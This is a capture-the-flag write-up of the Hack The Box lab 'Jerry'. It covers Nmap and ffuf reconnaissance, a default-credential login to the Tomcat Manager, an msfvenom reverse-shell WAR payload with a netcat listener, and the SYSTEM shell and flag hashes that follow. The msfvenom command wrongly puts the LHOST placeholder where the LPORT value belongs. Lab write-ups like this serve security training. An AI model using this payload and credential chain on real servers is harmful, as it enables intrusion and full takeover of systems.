avatarDfaults

Summary

A penetration tester successfully exploits a vulnerability in Apache Tomcat 7.0.88 on the Jerry machine hosted by Hack The Box (HTB), leading to remote code execution and system-level shell access.

Abstract

The context outlines a penetration testing scenario where the tester targets the Jerry machine on HTB. An initial Nmap scan identifies an exposed Apache Tomcat server running version 7.0.88. Using searchsploit, the tester finds known vulnerabilities for this version, specifically a JSP Upload Bypass leading to Remote Code Execution. Fuzzing with ffuf reveals accessible directories, including a /manager directory. The tester successfully logs in to the Tomcat Manager web application using default credentials (tomcat:s3cret). With access to the manager, the tester crafts a malicious WAR file using msfvenom to gain a reverse shell. After uploading the payload and listening with netcat, the tester achieves a shell with nt authority\system privileges. The final step involves locating the flags on the Administrator's desktop, concluding the machine's compromise.

Opinions

  • The author implies that default credentials are a common security oversight, as evidenced by the successful login to the Tomcat Manager using tomcat:s3cret.
  • The use of searchsploit and msfvenom suggests a reliance on well-known security tools to identify and exploit vulnerabilities.
  • The mention of the /manager directory being "interesting" indicates the author's view that management interfaces are valuable targets for penetration testers.
  • The tester's approach to gaining system-level access by exploiting a known vulnerability in an outdated version of Apache Tomcat underscores the importance of keeping software up to date to mitigate security risks.
  • The presence of flags in the Administrator's desktop directory is indicative of a common practice in CTF (Capture The Flag) challenges and penetration testing labs, where flags serve as proof of compromise.

HTB — Jerry

What do you say, Tom, can you catch me?

Starting with an Nmap scan we find 1 open port

# Nmap 7.93 scan initiated Wed Jan 24 01:18:54 2024 as: nmap -sV -sC -Pn -p 8080 -o nmap.txt jerry.htb
Nmap scan report for jerry.htb (10.129.145.195)
Host is up (0.097s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Wed Jan 24 01:19:06 2024 -- 1 IP address (1 host up) scanned in 12.54 seconds

Let’s try and see if the currently installed version of Apache Tomcat is vulnerable

$searchsploit Tomcat 7.0.88
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)                                                | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)                                                | jsp/webapps/42966.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Fuzzing the address gave us a few directories to look at

$./ffuf -w /usr/share/wordlists/dirb/big.txt -u <http://jerry.htb:8080/FUZZ> -o ../fuzzed.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________
 :: Method           : GET
 :: URL              : <http://jerry.htb:8080/FUZZ>
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Output file      : ../fuzzed.txt
 :: File format      : json
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
docs                    [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
examples                [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
favicon.ico             [Status: 200, Size: 21630, Words: 19, Lines: 22, Duration: 107ms]
lpt1                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 99ms]
lpt2                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 100ms]
manager                 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 98ms]
nul                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 121ms]
prn                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 114ms]
:: Progress: [20469/20469] :: Job [1/1] :: 395 req/sec :: Duration: [0:00:54] :: Errors: 0 ::

The /manager directory seems interesting and perhaps we can use some default credentials to login. In this case we can try using the username:password combination of tomcat:s3cretto try and login to the management webapp.

Once inside we see an upload section which we can use to our advantage, but we can only upload WAR files so let’s craft a payload for it which you can find here

For simplicity's sake the line we are looking for is this:

msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war

Now all we have to do is upload our payload and start the listener in our terminal using netcat:

nc -lvnp <LPORT>

And with that we get a shell as authority\system on the machine

$ nc -lvnp 4444
Ncat: Version 7.93 ( <https://nmap.org/ncat> )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.154.214.
Ncat: Connection from 10.129.154.214:49192.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\\apache-tomcat-7.0.88>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04
 Directory of C:\\apache-tomcat-7.0.88
06/19/2018  03:07 AM    <DIR>          .
06/19/2018  03:07 AM    <DIR>          ..
06/19/2018  03:06 AM    <DIR>          bin
06/19/2018  05:47 AM    <DIR>          conf
06/19/2018  03:06 AM    <DIR>          lib
05/07/2018  01:16 PM            57,896 LICENSE
01/25/2024  10:26 PM    <DIR>          logs
05/07/2018  01:16 PM             1,275 NOTICE
05/07/2018  01:16 PM             9,600 RELEASE-NOTES
05/07/2018  01:16 PM            17,454 RUNNING.txt
06/19/2018  03:06 AM    <DIR>          temp
01/25/2024  10:38 PM    <DIR>          webapps
06/19/2018  03:34 AM    <DIR>          work
               4 File(s)         86,225 bytes
               9 Dir(s)   2,420,121,600 bytes free
C:\\apache-tomcat-7.0.88>whoami
whoami
nt authority\\system

All that’s left is to find the flags which you can find in the Administrator Desktop folder which would finish this machine

C:\\Users\\Administrator\\Desktop\\flags>type "2 for the price of 1.txt" 
type "2 for the price of 1.txt" 
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
Cybersecurity
Learning
Writing
Technology
Medium
Recommended from ReadMedium